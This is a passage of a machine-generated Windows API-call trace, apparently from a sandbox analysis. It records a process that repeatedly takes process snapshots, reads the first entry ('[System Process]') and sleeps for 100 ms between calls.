cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.633] Sleep (dwMilliseconds=0x64) [0170.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.650] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.756] Sleep (dwMilliseconds=0x64) [0170.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.785] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.897] Sleep (dwMilliseconds=0x64) [0170.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.959] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.053] Sleep (dwMilliseconds=0x64) [0171.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0171.073] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.230] Sleep (dwMilliseconds=0x64) [0171.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0171.266] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.354] Sleep (dwMilliseconds=0x64) [0171.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0171.370] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.461] Sleep (dwMilliseconds=0x64) [0171.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0171.479] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.696] Sleep (dwMilliseconds=0x64) [0171.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0171.837] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.025] Sleep (dwMilliseconds=0x64) [0172.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0172.113] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.224] Sleep (dwMilliseconds=0x64) [0172.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0172.280] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.460] Sleep (dwMilliseconds=0x64) [0172.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0172.521] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.628] Sleep (dwMilliseconds=0x64) [0172.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0172.813] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.897] Sleep (dwMilliseconds=0x64) [0172.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0172.914] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.015] Sleep (dwMilliseconds=0x64) [0173.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0173.050] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.149] Sleep (dwMilliseconds=0x64) [0173.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0173.165] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.522] Sleep (dwMilliseconds=0x64) [0173.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0173.773] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.980] Sleep (dwMilliseconds=0x64) [0174.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.072] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.191] Sleep (dwMilliseconds=0x64) [0174.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.224] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.321] Sleep (dwMilliseconds=0x64) [0174.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.337] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.432] Sleep (dwMilliseconds=0x64) [0174.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.456] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.541] Sleep (dwMilliseconds=0x64) [0174.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.573] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.665] Sleep (dwMilliseconds=0x64) [0174.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.720] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.805] Sleep (dwMilliseconds=0x64) [0174.809] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.819] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.897] Sleep (dwMilliseconds=0x64) [0174.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0174.914] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.990] Sleep (dwMilliseconds=0x64) [0174.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0175.007] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.083] Sleep (dwMilliseconds=0x64) [0175.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc0 [0175.103] Process32First (in: hSnapshot=0xdc0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.425] Sleep (dwMilliseconds=0x64) [0175.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17f8 [0175.943] Process32First (in: hSnapshot=0x17f8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.096] Sleep (dwMilliseconds=0x64) [0176.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c0 [0176.175] Process32First (in: hSnapshot=0x17c0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.565] Sleep (dwMilliseconds=0x64) [0176.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c0 [0176.597] Process32First (in: hSnapshot=0x17c0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.679] Sleep (dwMilliseconds=0x64) [0176.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17cc [0176.743] Process32First (in: hSnapshot=0x17cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.847] Sleep (dwMilliseconds=0x64) [0176.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0176.892] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.008] Sleep (dwMilliseconds=0x64) [0177.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16ac [0177.041] Process32First (in: hSnapshot=0x16ac, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.151] Sleep (dwMilliseconds=0x64) [0177.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0177.178] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.387] Sleep (dwMilliseconds=0x64) [0177.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0177.423] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.565] Sleep (dwMilliseconds=0x64) [0177.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0177.596] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.676] Sleep (dwMilliseconds=0x64) [0177.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0177.714] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.788] Sleep (dwMilliseconds=0x64) [0177.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0177.804] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.886] Sleep (dwMilliseconds=0x64) [0177.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0177.923] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.006] Sleep (dwMilliseconds=0x64) [0178.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0178.028] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.135] Sleep (dwMilliseconds=0x64) [0178.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0178.160] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.246] Sleep (dwMilliseconds=0x64) [0178.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0178.283] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.797] Sleep (dwMilliseconds=0x64) [0178.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0178.831] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.908] Sleep (dwMilliseconds=0x64) [0178.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0178.940] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.012] Sleep (dwMilliseconds=0x64) [0179.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.050] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.159] Sleep (dwMilliseconds=0x64) [0179.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.190] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.438] Sleep (dwMilliseconds=0x64) [0179.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.506] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.606] Sleep (dwMilliseconds=0x64) [0179.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.635] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.758] Sleep (dwMilliseconds=0x64) [0179.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.790] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.882] Sleep (dwMilliseconds=0x64) [0179.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0179.900] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.992] Sleep (dwMilliseconds=0x64) [0179.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.008] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.086] Sleep (dwMilliseconds=0x64) [0180.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.100] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.212] Sleep (dwMilliseconds=0x64) [0180.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.239] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.331] Sleep (dwMilliseconds=0x64) [0180.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.354] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.486] Sleep (dwMilliseconds=0x64) [0180.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.519] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.611] Sleep (dwMilliseconds=0x64) [0180.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.642] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.750] Sleep (dwMilliseconds=0x64) [0180.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.783] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.857] Sleep (dwMilliseconds=0x64) [0180.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0180.891] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.971] Sleep (dwMilliseconds=0x64) [0180.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0181.004] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.384] Sleep (dwMilliseconds=0x64) [0181.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0181.406] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.553] Sleep (dwMilliseconds=0x64) [0181.571] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0181.583] Process32First (in: 